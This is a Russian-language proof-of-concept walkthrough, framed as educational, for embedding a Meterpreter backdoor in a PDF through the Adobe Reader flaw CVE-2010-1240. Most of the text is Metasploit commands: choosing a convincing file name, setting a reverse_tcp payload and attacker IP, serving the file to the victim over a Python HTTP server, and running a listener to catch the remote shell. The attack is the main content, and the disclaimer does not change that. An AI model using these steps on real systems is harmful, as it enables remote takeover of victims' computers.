
Образовательный proof-of-concept, демонстрирующий, как внедрить бэкдор Meterpreter в PDF-файл с использованием уязвимости CVE-2010-1240, с пошаговыми инструкциями по Metasploit для авторизованного тестирования безопасности.
⚠️ Только для образовательных и авторизованных исследовательских целей в области безопасности
Adobe Reader и Acrobat 9.x до 9.3.3, а также 8.x до 8.2.3 в Windows и Mac OS X не ограничивают содержимое одного текстового поля в диалоговом окне предупреждения Launch File, что облегчает удаленным злоумышленникам обманом заставить пользователей выполнить произвольную локальную программу, указанную в PDF-документе, как показано на примере текстового поля, утверждающего, что кнопка Open позволит пользователю прочитать зашифрованное сообщение.

Сначала запустите msfconsole
msfconsole
Затем установите полезную нагрузку для внедрения в PDF
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Установите параметр INFILENAME и укажите прямой путь к исходному PDF-файлу
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
Задайте имя новому вредоносному PDF-файлу, чтобы оно выглядело убедительнее, установив параметр FILENAME
set FILENAME laporan.pdf
Найдите и внедрите полезную нагрузку в PDF-файл
set payload windows/meterpreter/reverse_tcp
Установите параметр LHOST на IP-адрес атакующего
set LHOST 172.16.10.10
Откройте новый терминал и перейдите в папку с вредоносным PDF-файлом
cd .msf4/local/
Создайте временный сервер на Python
python -m http.server
Загрузите вредоносный PDF-файл на машину жертвы
http://172.16.10.10:8000/certificate.pdf
Перед запуском вредоносного PDF-файла на машине жертвы запустите слушатель в предыдущем терминале
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
Как только вредоносный PDF-файл будет выполнен на машине жертвы, вы получите подключение к машине жертвы